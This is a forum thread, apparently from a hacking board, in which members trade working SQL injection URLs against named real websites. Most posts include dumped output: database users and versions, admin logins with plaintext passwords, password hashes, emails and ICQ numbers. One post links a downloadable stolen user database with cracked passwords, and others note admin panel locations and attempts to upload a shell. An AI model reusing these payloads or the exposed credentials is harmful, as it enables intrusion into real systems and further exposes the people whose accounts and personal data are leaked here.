SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Zitt

    http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
     
  2. The_HuliGun

    It's possible if the main query is an update query or an insert query. You can only combine queries of the same type, not of different types.
     
  3. WhatUw81N4

    Forum administration!

    Ольга : qween1
     
  4. chekist

    select works in update and in insert
     
  5. dinar_007

    frugalreader.com, something like a book exchange for private individuals (SQL-inj + DB)

    SQL-inj:
    Code:
    http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=
    DB (4185 of 4613 passwords decrypted (almost 91%)):

    http://dinar007.by.ru/hbd/base_frugalreader.zip
    Archive password: antichat.ru
     
  6. sedoy_xxx

    www.lrn.ru
    Code:
    http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/*
    lrn_ru@localhost:lrn_ru:5.0.46-log/2 (no file_priv)
    Code:
    http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/*
    install path: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
    admin panel: http://www.lrn.ru/admin (I couldn't figure out how to upload a shell through it)
    Vitls:gjhextybt
     
    1 person likes this.
  7. WuWu

    HTML:
    http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/*
    [email protected]:alteregotutby
     
  8. WuWu

    HTML:
    http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
    5.0.24a
    climatea_climat@localhost
    climatea_climat


    There is access to schema, but I couldn't find the admin
     
    4 people like this.
  9. .Begemot.

    channelg.tv
    HTML:
    http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54
    channelg@localhost:4.0.24:channelg
    There's some kind of CMS there...
    uginfo.sfedu.ru
    HTML:
    http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/
    sgcs.fcm.unc.edu.ar
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/
    user - postgres
    version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/
    - table names
    HTML:
    http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/
    - column names
     
    2 people like this.
  10. BizzyD

    Code:
    http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/*
    netlink_netltbn@localhost:netlink_netltbn:5.0.24a

    Code:
    http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/*
    homelogin@localhost:homeopath:4.1.22
     
    #4530 BizzyD, 17 Jan 2008
    Last edited: 17 Jan 2008
    2 people like this.
  11. ElteRUS

    the exam session ate my brain :\
    ---

    http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/*

    4.1.22-standard/chatman_chatman/chatman_u51279@localhost
    -----------------------------------------------------------------------------

    http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/*

    4.1.21/mmp/mmp@localhost


    http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3,4,5,6,7,8,9,10+from+users/*

    login/password
    admin/mrkroz2909

    --------------------------------------------------------------------------

    And here the hellish network technology specialists are threatening the vile hackers :D

    http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*
     
    4 people like this.
  12. Momiji

    http://www.peekvid.com
    Code:
    http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/*

    5.0.22root@kentuckyprivpeekvid_v2

    Code:
    http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/*
    Root67ef27e02618b87a:ZAQxsw
     
    2 people like this.
  13. ElteRUS

    http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user())

    5.0.51/hdds/hdds@localhost


    http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email,icq)+from+forums_auth+limit+0,1

    login/hash/email/ICQ
    Cavaler/50cc3872ca61179a359e6263a3fd3d43/[email protected]/48555995
     
    1 person likes this.
  14. presidentua

    Does anyone need the Trud newspaper?
    Well then, here you go -
    Code:
    http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*
    trudinfo@localhost
    4.1.21-log
     
    2 people like this.
  15. ReVOLVeR

    MSSQL

    MySQL
     
    #4535 ReVOLVeR, 18 Jan 2008
    Last edited: 18 Jan 2008
    1 person likes this.
  16. .nor

    Code:
    http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))--
    The tables are henna and drops_5; I couldn't get any further because commas are harshly filtered.
    I tried various methods, including 0x2c, chars, etc. If anyone finds a replacement for that comma, please post the info here or PM me)
     
    #4536 .nor, 18 Jan 2008
    Last edited: 19 Jan 2008
  17. ХаЬа

    Code:
    http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*
    
    
     
    3 people like this.
  18. it's my

     
    4 people like this.
  19. none222

    sql-inj
     
    3 people like this.
  20. sasTO

    CMS I-cont

    _________________________________

    the culprit behind this mess :D :

    http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+imarket_users/*

    _________________________________


    the admin panels are located at

    http://site.ru/adm

    the password hashes are plain md5

    _________________________________

    P.S. hacked using a Nokia N70 phone, the Opera-mini (mod) browser and... not entirely clumsy hands :)
     
    11 people like this.